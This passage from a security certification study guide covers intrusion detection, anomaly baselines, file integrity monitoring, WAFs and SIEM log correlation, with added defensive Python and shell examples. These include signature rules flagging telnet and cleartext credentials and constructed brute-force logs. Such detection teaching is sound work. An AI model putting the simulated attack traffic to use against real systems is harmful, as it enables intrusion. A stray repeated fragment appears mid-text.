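A rule has a header (action protocol src sport -> dst dport) followed by
options in parentheses; only msg, content, sid and rev are used here.
Variable values, rules and packets are constructed for the example.
"""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed variable values, as would be set in snort.conf / suricata.yaml.
VARS = {"$HOME_NET": "10.0.0.0/8", "$EXTERNAL_NET": "!10.0.0.0/8"}

HEADER_RE = re.compile(
    r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+->\s+(\S+)\s+(\S+)\s+\((.*)\)\s*$")
OPTION_RE = re.compile(r'(\w+):\s*("(?:[^"\\]|\\.)*"|[^;]+);')


@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    dst: str
    dport: str
    options: Dict[str, str] = field(default_factory=dict)


@dataclass
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes


def parse_rule(text: str) -> Rule:
    """Split a rule into its header tuples and its option dictionary."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("not a rule: " + text)
    action, proto, src, sport, dst, dport, opts = m.groups()
    options = {k: v.strip().strip('"') for k, v in OPTION_RE.findall(opts)}
    return Rule(action, proto, src, sport, dst, dport, options)


def addr_matches(spec: str, ip: str) -> bool:
    spec = VARS.get(spec, spec)              # expand $HOME_NET etc.
    if spec == "any":
        return True
    negate = spec.startswith("!")            # "!net" means "not in net"
    return (ipaddress.ip_address(ip) in ipaddress.ip_network(spec.lstrip("!"))) != negate


def port_matches(spec: str, port: int) -> bool:
    return spec == "any" or int(spec) == port


def match(rule: Rule, pkt: Packet) -> bool:
    """Header tuples must all match; then the content pattern, if any."""
    if rule.proto != pkt.proto:
        return False
    if not (addr_matches(rule.src, pkt.src) and port_matches(rule.sport, pkt.sport)):
        return False
    if not (addr_matches(rule.dst, pkt.dst) and port_matches(rule.dport, pkt.dport)):
        return False
    content = rule.options.get("content")
    return content is None or content.encode() in pkt.payload


def run_engine(rules: List[Rule], packets: List[Packet]) -> List[str]:
    """Return an alert line for every rule that fires, in packet order."""
    alerts = []
    for pkt in packets:
        for rule in rules:
            if match(rule, pkt):
                alerts.append(f"[{rule.options.get('sid', '?')}] {rule.options.get('msg', '')}")
    return alerts


# Constructed policy rules (sid values in the 1000000+ local range).
RULES_TEXT = [
    'alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"POLICY cleartext HTTP Basic credentials"; content:"Authorization: Basic"; sid:1000001; rev:1;)',
    'alert tcp any any -> $HOME_NET 23 (msg:"POLICY telnet to internal host"; sid:1000002; rev:1;)',
]
```

The header alone is a five-tuple filter much like a firewall rule; what makes it a signature is the `content` option, which is only checked once the header matches, and the `sid`/`rev` pair, which is how a feed identifies and versions each signature so that an update can replace it.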

Show Slide(s): Behavior- and Anomaly-Based Detection

Behavior- and Anomaly-Based Detection

Behavioral-based detection means that the engine is trained to recognize baseline "normal" traffic or events. Anything that deviates from this baseline (outside a defined level of tolerance) generates an incident. The idea is that the software will be able to identify zero-day attacks, insider threats, and other malicious activity for which there is no single signature.

Historically, this type of detection was provided by network behavior and anomaly detection (NBAD) products. An NBAD engine uses heuristics (meaning to learn from experience) to generate a statistical model of what baseline "normal" traffic looks like. It may develop several profiles to model network use at different times of the day. This means that the system generates false positives and false negatives until it has had time to improve its statistical model of what is "normal." A false positive is where legitimate behavior generates an alert, while a false negative is where malicious activity is not alerted.

While NBAD products were relatively unsophisticated, the use of machine learning in more recent products has helped to make them more productive. As identified by Gartner's market analysis ("Market Guide for User and Entity Behavior Analytics," gartner.com), there are two general classes of behavior-based detection products that utilize machine learning:

• User and entity behavior analytics (UEBA): these products scan indicators from multiple intrusion detection and log sources to identify anomalies. They are often integrated with security information and event management (SIEM) platforms.

• Network traffic analysis (NTA): these products are closer to IDS and NBAD in that they apply analysis techniques only to network streams, rather than multiple network and log data sources.

Often behavioral- and anomaly-based detection are taken to mean the same thing (in the sense that the engine detects anomalous behavior). Anomaly-based detection can also be taken to mean specifically looking for irregularities in the use of protocols. For example, the engine may check packet headers or the exchange of packets in a session against RFC standards and generate an alert if they deviate from strict RFC compliance.

Teaching Tip: Make sure students understand the differences between detection methods and false negatives and false positives.
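The statistical baseline idea from the NBAD paragraph, as an added example written for this page (it is not any product's algorithm). The engine learns a per-hour profile of traffic volume from a training period, then flags samples that fall outside a tolerance expressed as a z-score; scoring it against labelled samples makes the false positive / false negative trade-off concrete. All traffic figures are constructed.

```python
"""Added example: a per-hour statistical baseline of "normal" traffic volume.

Illustrative only; not an NBAD product's algorithm. The engine learns the
mean and standard deviation of bytes per minute for each hour of the day
from a training period, then flags a sample whose z-score exceeds a
tolerance. score() counts true/false positives and negatives against
constructed ground truth. All samples are constructed.
"""
import statistics
from typing import Dict, List, Tuple

Sample = Tuple[int, float]   # (hour of day, bytes per minute)


class VolumeBaseline:
    def __init__(self, tolerance: float = 3.0):
        self.tolerance = tolerance   # z-score threshold ("level of tolerance")
        self.profile: Dict[int, Tuple[float, float]] = {}   # hour -> (mean, stdev)

    def train(self, samples: List[Sample]) -> None:
        """Build one profile per hour so daytime and night-time differ."""
        by_hour: Dict[int, List[float]] = {}
        for hour, volume in samples:
            by_hour.setdefault(hour, []).append(volume)
        for hour, values in by_hour.items():
            mean = statistics.mean(values)
            stdev = statistics.pstdev(values) or 1.0   # avoid division by zero
            self.profile[hour] = (mean, stdev)

    def is_anomalous(self, sample: Sample) -> bool:
        hour, volume = sample
        if hour not in self.profile:     # no baseline yet: the engine cannot judge
            return False
        mean, stdev = self.profile[hour]
        return abs(volume - mean) / stdev > self.tolerance


def score(engine: VolumeBaseline, labelled: List[Tuple[Sample, bool]]) -> Dict[str, int]:
    """Count detections against ground truth (True = actually malicious)."""
    counts = {"true_positive": 0, "false_positive": 0,
              "true_negative": 0, "false_negative": 0}
    for sample, malicious in labelled:
        flagged = engine.is_anomalous(sample)
        if flagged and malicious:
            counts["true_positive"] += 1
        elif flagged:
            counts["false_positive"] += 1    # legitimate activity alerted
        elif malicious:
            counts["false_negative"] += 1    # malicious activity missed
        else:
            counts["true_negative"] += 1
    return counts


# Constructed training data: quiet at 03:00, busy at 14:00.
TRAINING: List[Sample] = ([(3, v) for v in (2000, 2500, 1800, 2200, 2100)]
                          + [(14, v) for v in (50000, 52000, 48000, 51000, 49000)])

# Constructed labelled samples: a large night-time transfer (malicious), a
# legitimate night-time backup (benign but unusual), a small daytime excess
# hidden inside normal variation (malicious), and a daytime burst (malicious).
LABELLED: List[Tuple[Sample, bool]] = [
    ((3, 40000), True),
    ((14, 50500), False),
    ((14, 54000), False),
    ((3, 3000), False),
    ((14, 52500), True),
    ((14, 60000), True),
]
```

With the constructed data the engine catches the two large deviations, misses the "low and slow" daytime transfer that sits within normal variation (a false negative), and alerts on the legitimate night-time backup (a false positive). Raising the tolerance trades the second problem for more of the first, which is the tuning decision the text describes and the reason an IPS with behaviour-based detection can block legitimate users.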

Show Slide(s): Next-Generation Firewalls and Content Filters

Next-Generation Firewalls and Content Filters

While intrusion detection was originally produced as standalone software or appliances, its functionality very quickly became incorporated into a new generation of firewalls. The original next-generation firewall (NGFW) was released by Palo Alto. This product combined application-aware filtering with user account-based filtering and the ability to act as an intrusion prevention system (IPS). This approach was quickly adopted by competitor products. Subsequent firewall generations have added capabilities such as cloud inspection and combined features of different security technologies.

Unified Threat Management (UTM)

Unified threat management (UTM) refers to a security product that centralizes many types of security controls (firewall, anti-malware, network intrusion prevention, spam filtering, content filtering, data loss prevention, VPN, cloud access gateway) into a single appliance. This means that you can monitor and manage the controls from a single console. Nevertheless, UTM has some downsides. When defense is unified under a single system, this creates the potential for a single point of failure that could affect an entire network. Distinct security systems, if they fail, might only compromise that particular avenue of attack. Additionally, UTM systems can struggle with latency issues if they are subject to too much network activity. Also, a UTM might not perform as well as software or a device with a single dedicated security function.

To some extent, NGFW and UTM are just marketing terms. A UTM is seen as a turnkey, do-everything solution, while an NGFW is an enterprise product with fewer features, or more modularization, and greater configuration complexity, but better performance. It can be more helpful to focus on the specific product features, rather than trying to present an implementation decision as a choice of either an NGFW or a UTM.

Teaching Tip: Encourage students to use both market research and vendor sites to navigate the various product classifications.

Content/URL Filter

A firewall has to sustain high loads, and overloads can increase latency or even cause outages. The high complexity of application-aware NGFW and UTM solutions can reduce their suitability as an edge device, because while they might provide high confidentiality and integrity, lower throughput reduces availability. One solution to this is to treat security solutions for server traffic differently from that for user traffic. User traffic refers to web browsing, social networking, email, and video/VoIP connections initiated by local network clients.

Consequently, where a stateful or NGFW firewall may be deployed for application server traffic, the job of filtering user traffic is often performed by a separate appliance or proxy host. A content filter is designed to apply a number of user-focused filtering rules, such as blocking uniform resource locators (URLs) that appear on content blacklists or applying time-based restrictions to browsing. Content filters are now usually implemented as a class of product called a secure web gateway (SWG). As well as filtering, an SWG performs threat analysis and often integrates the functionality of data loss prevention (DLP) and cloud access security brokers (CASB) to protect against the full range of unauthorized egress threats, including malware command and control and data exfiltration.

Show Slide(s): Host-Based Intrusion Detection Systems

Host-Based Intrusion Detection Systems

A host-based IDS (HIDS) captures information from a single host, such as a server, router, or firewall. Some organizations may configure HIDS on each client workstation. HIDS come in many different forms with different capabilities. The core ability is to capture and analyze log files, but more sophisticated systems can also monitor kernel files, monitor ports and network interfaces, and process data and logs generated by specific applications, such as HTTP or FTP.

HIDS software produces similar output to an anti-malware scanner. If the software detects a threat, it may just log the event or display an alert. The log should show you which process initiated the event and what resources on the host were affected. You can use the log to investigate whether the suspect process is authorized or should be removed from the host.

One of the core features of HIDS is file integrity monitoring (FIM). This may also be implemented as a standalone feature. When software is installed from a legitimate source (using signed code in the case of Windows or a secure repository in the case of Linux), the package manager checks the signature or fingerprint of each executable file and notifies the user if there is a problem. FIM software audits key system files to make sure they match the authorized versions. In Windows, the Windows File Protection service runs automatically and the System File Checker (sfc) tool can be used manually to verify system files. Tripwire (tripwire.com) and OSSEC (ossec.net) are examples of multi-platform tools with options to protect a wider range of applications.

Teaching Tip: We're including FIM here as part of the 3.3 network design objective. Note that we will cover endpoint protection suites in a different lesson.
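File integrity monitoring as just described, reduced to its core mechanism in an added example written for this page (it is not Tripwire's or OSSEC's code). A baseline records a SHA-256 digest and size for every file under a monitored root; a later check re-hashes the tree and reports files that were modified, removed or added. The directory tree that `demo()` builds is a constructed temporary tree, and the file names in it are placeholders.

```python
"""Added example: a minimal file integrity monitor.

Not Tripwire's or OSSEC's code. build_baseline() records the SHA-256 digest
and size of each file under a root; check_integrity() re-hashes the tree and
reports modified, removed and added files. It deliberately re-hashes rather
than trusting size or mtime, since both can be preserved by whoever altered
the file. demo() builds a constructed temporary tree to exercise it.
"""
import hashlib
import os
import shutil
import tempfile
from typing import Dict, List, Tuple

Entry = Tuple[str, int]   # (sha256 hex digest, size in bytes)


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> Dict[str, Entry]:
    """Walk root and record (digest, size) keyed by path relative to root."""
    baseline: Dict[str, Entry] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = (sha256_file(full), os.path.getsize(full))
    return baseline


def check_integrity(root: str, baseline: Dict[str, Entry]) -> Dict[str, List[str]]:
    """Compare the current tree against a previously recorded baseline."""
    current = build_baseline(root)
    report: Dict[str, List[str]] = {"modified": [], "removed": [], "added": []}
    for rel, (digest, _size) in baseline.items():
        if rel not in current:
            report["removed"].append(rel)
        elif current[rel][0] != digest:
            report["modified"].append(rel)
    report["added"] = [rel for rel in current if rel not in baseline]
    for key in report:
        report[key].sort()
    return report


def demo() -> Tuple[Dict[str, List[str]], Dict[str, List[str]]]:
    """Baseline a constructed tree, tamper with it, and return both reports."""
    root = tempfile.mkdtemp()
    try:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"original binary")           # constructed placeholder content
        with open(os.path.join(root, "passwd"), "wb") as f:
            f.write(b"root:x:0:0\n")
        baseline = build_baseline(root)
        clean = check_integrity(root, baseline)    # nothing changed yet
        # Simulated changes: overwrite one file, delete one, add one.
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"replaced binary")
        os.remove(os.path.join(root, "passwd"))
        with open(os.path.join(root, "extra.bin"), "wb") as f:
            f.write(b"x")
        tampered = check_integrity(root, baseline)
        return clean, tampered
    finally:
        shutil.rmtree(root)
```

The baseline is only as trustworthy as its storage: a real deployment keeps it signed or on read-only/offline media, since an attacker who can rewrite the monitored files can usually also rewrite a baseline kept beside them. A failed check, as the review question on sfc notes, is a reason to investigate rather than a diagnosis on its own.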


Show Slide(s): Web Application Firewalls

Web Application Firewalls

A web application firewall (WAF) is designed specifically to protect software running on web servers and their backend databases from code injection and DoS attacks. WAFs use application-aware processing rules to filter traffic and perform application-specific intrusion detection. The WAF can be programmed with signatures of known attacks and use pattern matching to block requests containing suspect code. The output from a WAF will be written to a log, which you can inspect to determine what threats the web application might be subject to.

Teaching Tip: We'll be turning to web application security in more detail later in the course. Just make sure students can distinguish the function of a WAF from more general network/host firewall/IDS types.

With the ModSecurity WAF installed to this IIS server, a scanning attempt has been detected and logged as an Application event. As you can see, the default ruleset generates a lot of events. (Screenshot used with permission from Microsoft.)

A WAF may be deployed as an appliance or as plug-in software for a web server platform. Some examples of WAF products include:

• ModSecurity (modsecurity.org) is an open source (sponsored by Trustwave) WAF for Apache, nginx, and IIS.

• NAXSI (github.com/nbs-system/naxsi) is an open source module for the nginx web server software.

• Imperva (imperva.com) is a commercial web security offering with a particular focus on data centers. Imperva markets WAF, DDoS, and database security through its SecureSphere appliance.


Review Activity:
Network Security Monitoring

Answer the following questions:

1. What is the best option for monitoring traffic passing from host-to-host on the same switch?

The only option for monitoring intra-switch traffic is to use a mirrored port.

2. What sort of maintenance must be performed on signature-based monitoring software?

Installing definition/signature updates and removing definitions that are not relevant to the hosts or services running on your network.

3. What is the principal risk of deploying an intrusion prevention system with behavior-based detection?

Behavior-based detection can exhibit high false positive rates, where legitimate activity is wrongly identified as malicious. With automatic prevention, this will block many legitimate users and hosts from the network, causing availability and support issues.

4. If a Windows system file fails a file integrity check, should you suspect a malware infection?

Yes, malware is a likely cause that you should investigate.

5. What is a WAF?

A web application firewall (WAF) is designed to protect HTTP and HTTPS applications. It can be configured with signatures of known attacks against applications, such as injection-based attacks or scanning attacks.


Topic 10C
Summarize the Use of SIEM

EXAM OBJECTIVES COVERED
1.7 Summarize the techniques used in security assessments
3.3 Given a scenario, implement secure network designs
4.1 Given a scenario, use the appropriate tool to assess organizational security

There are many types of security controls that can be deployed to protect networks, hosts, and data. One thing that all these controls have in common is that they generate log data and alerts. Reviewing this output is one of the principal challenges in information security management. As a security professional, you must be able to describe, install, and configure systems to manage logging and events.

Teaching Tip: SIEM can be a complex technology to implement. Focus on identifying the components of a SIEM system and sources of data.

Monitoring Services
Security assessments and incident response both require real-time monitoring of host and network status indicators plus audit information.

Teaching Tip: Give an overview of the types of data that need to be collected, aggregated, and analyzed.

Packet Capture
Data captured from network sensors (sniffers) plus netflow sources provides both summary statistics about bandwidth and protocol usage and the opportunity for detailed frame analysis.

Network Monitors
As distinct from network traffic monitoring, a network monitor collects data about network appliances, such as switches, access points, routers, firewalls, and servers. This is used to monitor load status for CPU/memory, state tables, disk capacity, fan speeds/temperature, network link utilization/error statistics, and so on. Another important function is a heartbeat message to indicate availability. This data might be collected using the Simple Network Management Protocol (SNMP) or a proprietary management system. As well as supporting availability, network monitoring might reveal unusual conditions that could point to some kind of attack.

Logs
Logs are one of the most valuable sources of security information. A system log can be used to diagnose availability issues. A security log can record both authorized and unauthorized uses of a resource or privilege. Logs function both as an audit trail of actions and, if monitored regularly, provide a warning of intrusion attempts. Log review is a critical part of security assurance. Only referring to the logs following a major incident is missing the opportunity to identify threats and vulnerabilities early and to respond proactively.

Logs typically associate an action with a particular user. This is one of the reasons that it is critical that users not share logon details. If a user account is compromised, there is no means of tying events in the log to the actual attacker.

Lesson 10: Implementing Network Security Appliances | Topic 10C

Security Information and Event Management
Software designed to assist with managing security data inputs and provide reporting and alerting is often described as security information and event management (SIEM). The core function of a SIEM tool is to aggregate traffic data and logs. In addition to logs from Windows and Linux-based hosts, this could include switches, routers, firewalls, IDS sensors, vulnerability scanners, malware scanners, data loss prevention (DLP) systems, and databases.

Teaching Tip: Point out the difference between sensor/collector placement and the location of the correlation and reporting server.

OSSIM SIEM dashboard. Configurable dashboards provide the high-level status view of network security metrics. (Screenshot used with permission from AT&T Cybersecurity.)

Log Collection
The first task for SIEM is to collect data inputs from multiple sources. There are three main types of log collection:

• Agent-based: with this approach, you must install an agent service on each host. As events occur on the host, logging data is filtered, aggregated, and normalized at the host, then sent to the SIEM server for analysis and storage.

• Listener/collector: rather than installing an agent, hosts can be configured to push updates to the SIEM server using a protocol such as syslog or SNMP. A process runs on the management server to parse and normalize each log/monitoring source.

Syslog (the original BSD message format is documented in RFC 3164 and the current protocol in RFC 5424) allows for centralized collection of events from multiple sources. It also provides an open format for event logging messages, and as such has become a de facto standard for logging of events from distributed systems. For example, syslog messages can be generated by Cisco routers and switches, as well as servers and workstations.

• Sensor: as well as log data, the SIEM might collect packet captures and traffic flow data from sniffers.


Enabling a log parser plug-in for a pfSense security appliance so that firewall events can be imported into the SIEM. (Screenshot used with permission from AT&T Cybersecurity.)

Log Aggregation
As distinct from collection, aggregation refers to normalizing data from different sources so that it is consistent and searchable. SIEM software features connectors or plug-ins to interpret (or parse) data from distinct types of systems and to account for differences between vendor implementations. Usually parsing will be carried out using regular expressions tailored to each log file format to identify attributes and content that can be mapped to standard fields in the SIEM's reporting and analysis tools. Another important function is to normalize date/time zone differences to a single timeline.

Analysis and Report Review
Where collection and aggregation produce inputs, a SIEM is also used for reporting. A critical function of SIEM, and the principal factor distinguishing it from basic log management, is that of correlation. This means that the SIEM software can link individual events or data points (observables) into a meaningful indicator of risk, or Indicator of Compromise (IoC). Correlation can then be used to drive an alerting system. These reports would be viewed from the SIEM dashboard.

Basic correlation can be performed using simple If/Then-type rules. However, many SIEM solutions use artificial intelligence (AI) and machine learning as the basis for automated analysis.

Teaching Tip: Note that we will return to the use of SIEM and SOAR in the lesson on incident response. Here, equip students with a broad overview of product capabilities.
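The aggregation step described under Log Aggregation and the If/Then correlation rule described here, as one added shell example that is not part of the guide: two constructed syslog sources (sshd messages from a Linux host and Cisco IOS ACL deny messages from a switch, both made up here) are parsed into a single host|source_ip|event schema with sed, and an awk rule then raises an indicator when one source address fails authentication at least three times and afterwards succeeds, enriched with how often the switch ACL also blocked that address. The host names, addresses, threshold and alert format are assumptions.

```shell
#!/bin/sh
# Added example (not from the CompTIA guide): the collection -> aggregation ->
# correlation pipeline in shell. Vendor-specific log lines are parsed into one
# normalized schema, then an If/Then rule is run over the normalized stream.

# Constructed sample input (made up for this example): sshd messages from a
# Linux host and Cisco IOS ACL deny messages from a switch, both received via
# syslog. Timestamps are the 15-character BSD syslog format.
SAMPLE_LOGS='Mar  3 10:01:02 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.5 port 40001 ssh2
Mar  3 10:01:04 web01 sshd[2211]: Failed password for root from 203.0.113.5 port 40002 ssh2
Mar  3 10:01:07 web01 sshd[2211]: Failed password for root from 203.0.113.5 port 40003 ssh2
Mar  3 10:01:09 web01 sshd[2215]: Accepted password for root from 203.0.113.5 port 40004 ssh2
Mar  3 10:01:10 web01 sshd[2218]: Failed password for root from 198.51.100.7 port 51000 ssh2
Mar  3 10:01:11 edge-sw1 12: %SEC-6-IPACCESSLOGP: list 101 denied tcp 203.0.113.5(4444) -> 10.0.0.8(22), 1 packet
Mar  3 10:01:12 edge-sw1 13: %SEC-6-IPACCESSLOGP: list 101 denied tcp 198.51.100.7(4444) -> 10.0.0.9(22), 1 packet'

# Aggregation: one regex per source format maps each line onto the schema
#   host|source_ip|event
# Lines that match no parser are dropped: "t" branches past "d" only when a
# substitution succeeded. In production, count those lines instead of losing them.
normalize_logs() {
    sed -E \
        -e 's/^.{15} ([^ ]+) sshd\[[0-9]+\]: Failed password for .* from ([0-9.]+) port .*/\1|\2|auth_failure/' \
        -e 's/^.{15} ([^ ]+) sshd\[[0-9]+\]: Accepted password for .* from ([0-9.]+) port .*/\1|\2|auth_success/' \
        -e 's/^.{15} ([^ ]+) [0-9]+: %SEC-6-IPACCESSLOGP: list [0-9]+ denied [a-z]+ ([0-9.]+)\([0-9]+\) -> .*/\1|\2|acl_deny/' \
        -e t -e d
}

# Correlation rule: IF a source IP produced at least THRESHOLD auth_failure
# events AND an auth_success THEN emit an indicator, enriched with how many
# times the switch ACL also blocked that IP (a second, independent source).
correlate() {
    threshold="${1:-3}"
    awk -F'|' -v th="$threshold" '
        $3 == "auth_failure" { fails[$2]++ }
        $3 == "auth_success" { success[$2] = $1 }
        $3 == "acl_deny"     { denies[$2]++ }
        END {
            for (ip in success)
                if (fails[ip] >= th)
                    printf "ALERT brute_force_success host=%s src=%s failures=%d acl_denies=%d\n",
                           success[ip], ip, fails[ip], denies[ip] + 0
        }'
}

# Run the whole pipeline over the sample; the threshold defaults to 3.
run_pipeline() {
    printf '%s\n' "$SAMPLE_LOGS" | normalize_logs | correlate "${1:-3}"
}

run_pipeline
```

Keeping the parsers separate from the rule is the point: the rule never sees vendor syntax, so the same If/Then logic applies whether the failures came from sshd, a VPN concentrator or a Windows event log once a parser exists for each. Running it with a threshold of 4 produces no alert, which is the tuning trade-off between missed brute-force attempts and noise.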
students with a broad
User and Entity Behavior Analytics
A user and entity behavior analytics (UEBA) solution supports identification of malicious behaviors from comparison to a baseline. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and to embedded hardware, such as Internet of Things (IoT) devices. The complexity of determining baselines and reducing false positives means that UEBA solutions are heavily dependent on AI and machine learning. Examples include Microsoft's Advanced Threat Analytics (docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata) and Splunk UBA (splunk.com/en_us/software/user-behavior-analytics.html).

Sentiment Analysis
One of the biggest challenges for behavior analytics driven by machine learning is to identify intent. It is extremely difficult for a machine to establish the context and interpretation of statements in natural language, though much progress is being made. The general efforts in this area are referred to as sentiment analysis, or emotion AI. The typical use case for sentiment analysis is to monitor social media for brand "incidents," such as a disgruntled customer announcing on Twitter what poor customer service they have just received. In terms of security, this can be used to gather threat intelligence and try to identify external or insider threats before they can develop as attacks.

Security Orchestration, Automation, and Response
Security orchestration, automation, and response (SOAR) is designed as a solution to the problem of the volume of alerts overwhelming analysts' ability to respond. A SOAR may be implemented as a standalone technology or integrated with a SIEM, often referred to as a next-gen SIEM. The basis of SOAR is to scan the organization's store of security and threat intelligence, analyze it using machine/deep learning techniques, and then use that data to automate and provide data enrichment for the workflows that drive incident response and threat hunting.

File Manipulation
While SIEM can automate many functions of log collection and review, you may also have to manually prepare data using a Linux command line.

The cat Command
The Linux command cat allows you to view the contents of one or more files. For example, if you want to view the whole contents of two rotated log files, you could run:

cat -n access.log access2.log

The -n switch adds line numbers. If you wanted to output to a new file rather than the terminal, you can run:

cat -n access.log access2.log > access_cat.log

The head and tail Commands
The head and tail commands output the first and last lines respectively of a file you provide. By default they show ten lines; you can adjust this value to output more or fewer lines using the -n switch. For example, the following command shows the 20 most recent entries in a log file:

tail /var/log/messages -n 20

GNU tail accepts the option after the file name, as shown here, but the portable form puts the options first: tail -n 20 /var/log/messages.

The logger Command
The logger command writes input to the local system log or to a remote syslog server (linux.die.net/man/1/logger). You can use the command in a script to write any text string or use the -f option to write the contents of another file. You can also write the output of commands by enclosing the command in backticks. The following command writes the name of the local machine along with the text "up" to the syslog server at 10.1.0.242:

logger -n 10.1.0.242 `hostname` up
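The cat, head, tail and logger commands above applied to two constructed rotated access logs, as an added shell example that is not from the guide. The log contents, the temporary directory and the function names are invented for the example; the logger call is guarded because a sandbox may have neither the binary nor a syslog daemon.

```shell
#!/bin/sh
# Added example (not from the CompTIA guide): cat, head, tail and logger applied
# to two constructed rotated web server logs. Paths and contents are made up.

WORKDIR=$(mktemp -d)

# access2.log is the older rotated file; access.log holds the newest entries.
printf '%s\n' \
  '10.0.0.5 - - [03/Mar/2021:09:58:01 +0000] "GET /index.html HTTP/1.1" 200 512' \
  '10.0.0.5 - - [03/Mar/2021:09:58:02 +0000] "GET /login HTTP/1.1" 200 845' \
  > "$WORKDIR/access2.log"
printf '%s\n' \
  '203.0.113.5 - - [03/Mar/2021:10:01:02 +0000] "POST /login HTTP/1.1" 401 0' \
  '203.0.113.5 - - [03/Mar/2021:10:01:03 +0000] "POST /login HTTP/1.1" 401 0' \
  '203.0.113.5 - - [03/Mar/2021:10:01:09 +0000] "POST /login HTTP/1.1" 302 0' \
  > "$WORKDIR/access.log"

# cat -n concatenates and numbers lines. The OLDER file goes first so the line
# numbers follow the timeline; listing access.log before access2.log would put
# the newest entries at the top of the combined file. Prints the line count.
combine_logs() {
    cat -n "$WORKDIR/access2.log" "$WORKDIR/access.log" > "$WORKDIR/access_cat.log"
    wc -l < "$WORKDIR/access_cat.log" | tr -d ' '
}

# tail -n N prints the N most recent entries (the last lines appended);
# head -n N prints the N oldest. Options go before the file name for portability.
recent_entries() { tail -n "$1" "$WORKDIR/access_cat.log"; }
oldest_entries() { head -n "$1" "$WORKDIR/access_cat.log"; }

# How many of the last N requests were rejected with HTTP 401.
# grep -c exits 1 when the count is 0, so "|| true" keeps the function's status 0.
recent_failures() { recent_entries "$1" | grep -c ' 401 ' || true; }

# logger writes to the local syslog; "-n HOST" would send to a remote collector
# instead. Guarded: a container may have no logger binary or no syslog daemon.
log_review_marker() {
    if command -v logger >/dev/null 2>&1; then
        logger -t access-review "$(uname -n) reviewed $(combine_logs) lines" 2>/dev/null || true
    fi
}

combine_logs
recent_entries 3
log_review_marker
```

The file order given to cat is the detail that matters for review work: cat simply concatenates, so the analyst has to supply the chronological order, and line numbers from -n are only meaningful once that is right.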

Regular Expressions and grep
Filtering a log to discover data points of interest usually involves some sort of string search, typically invoking regular expression (regex) syntax. A regular expression is a search pattern to match within a given string. The search pattern is built from the regex syntax. This syntax defines metacharacters that function as search operators, quantifiers, logic statements, and anchors/boundaries. The following list illustrates some commonly used elements of regex syntax:

• [ … ] matches a single instance of a character within the brackets. This can include literals, ranges such as [a-z], and token matches, such as [\s] (white space) or [\d] (one digit).

• + matches one or more occurrences. A quantifier is placed after the term to match; for example, \s+ matches one or more white space characters.

• * matches zero or more times.

• ? matches once or not at all.

• {} matches a number of times. For example, {2} matches two times, {2,} matches two or more times, and {2,5} matches two to five times.

A complete description of regex syntax is beyond the scope of this course, but you can use an online reference such as regexr.com or rexegg.com to learn it.

The grep command invokes simple string matching or regex syntax to search text files for specific strings. This enables you to search the entire contents of a text file for a specific pattern within each line and display that pattern on the screen or dump it to another file. A simple example of grep usage is as follows:

grep -F 192.168.1.254 access.log

This searches the text file access.log for all lines containing the literal string 192.168.1.254 and prints only those lines to the terminal. The -F switch instructs grep to treat the pattern as a literal rather than as a regex, in which each unescaped period would match any character.

The following example searches for any IP address in the 192.168.1.0/24 subnet, using regex syntax for the pattern (note that each period must be escaped), within any file in any directory from the current one. The -r option enables recursion, while the period in the target part indicates the current directory. The -E option selects extended regex syntax, which is needed for the {1,3} quantifier; the \d token is Perl syntax that grep only understands in -P mode, so the digit class is written as [0-9] here, and the pattern is quoted so that the shell does not expand the brackets and braces:

grep -rE '192\.168\.1\.[0-9]{1,3}' .
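The two grep searches above run against constructed log files, as an added shell example that is not from the guide. It shows the three results a practitioner has to tell apart: an unescaped-period regex, a literal search with -F, and a word-bounded search with -w, plus the recursive subnet search with a quantifier. The log lines, directory layout and function names are invented for the example.

```shell
#!/bin/sh
# Added example (not from the CompTIA guide): the grep searches from the text
# run against constructed log files, showing the difference between a literal
# search, an unanchored regex, and a word-bounded regex.

WORKDIR=$(mktemp -d)
mkdir -p "$WORKDIR/logs/archive"

# Constructed access.log. Line 3 is deliberately malformed and line 4 hides
# the address inside a longer digit string, to show two common false positives.
printf '%s\n' \
  '192.168.1.254 - - [03/Mar/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512' \
  '192.168.1.25 - - [03/Mar/2021:10:00:02 +0000] "GET /a HTTP/1.1" 200 10' \
  '192x168x1x254 - - [03/Mar/2021:10:00:03 +0000] "GET /b HTTP/1.1" 200 10' \
  '203.0.113.9 - - [03/Mar/2021:10:00:04 +0000] "GET /search?q=192.168.1.2541 HTTP/1.1" 404 0' \
  '172.16.0.3 - - [03/Mar/2021:10:00:05 +0000] "GET /c HTTP/1.1" 200 10' \
  > "$WORKDIR/logs/access.log"
printf '%s\n' \
  '192.168.1.7 - - [02/Mar/2021:23:59:59 +0000] "GET /old HTTP/1.1" 200 10' \
  > "$WORKDIR/logs/archive/access.log.1"

LOG="$WORKDIR/logs/access.log"

# Unescaped periods are regex wildcards: this also matches 192x168x1x254 and
# the 192.168.1.254 substring inside 192.168.1.2541.
unanchored_regex_hits() { grep -c '192.168.1.254' "$LOG" || true; }

# -F treats the pattern as a literal, which drops the 192x168x1x254 line but
# still matches the substring inside 192.168.1.2541.
literal_hits() { grep -cF '192.168.1.254' "$LOG" || true; }

# -w requires the match to be a whole word (bounded by non-alphanumerics), so
# only the genuine 192.168.1.254 client line remains.
literal_word_hits() { grep -cFw '192.168.1.254' "$LOG" || true; }

# Every distinct 192.168.1.0/24 host seen in any file below the logs directory.
# -r recurses, -h suppresses file names, -o prints only the matched text, -E
# enables the {1,3} quantifier; [0-9] is used because \d is Perl syntax that
# grep only understands with -P. -w again stops 192.168.1.2541 from matching.
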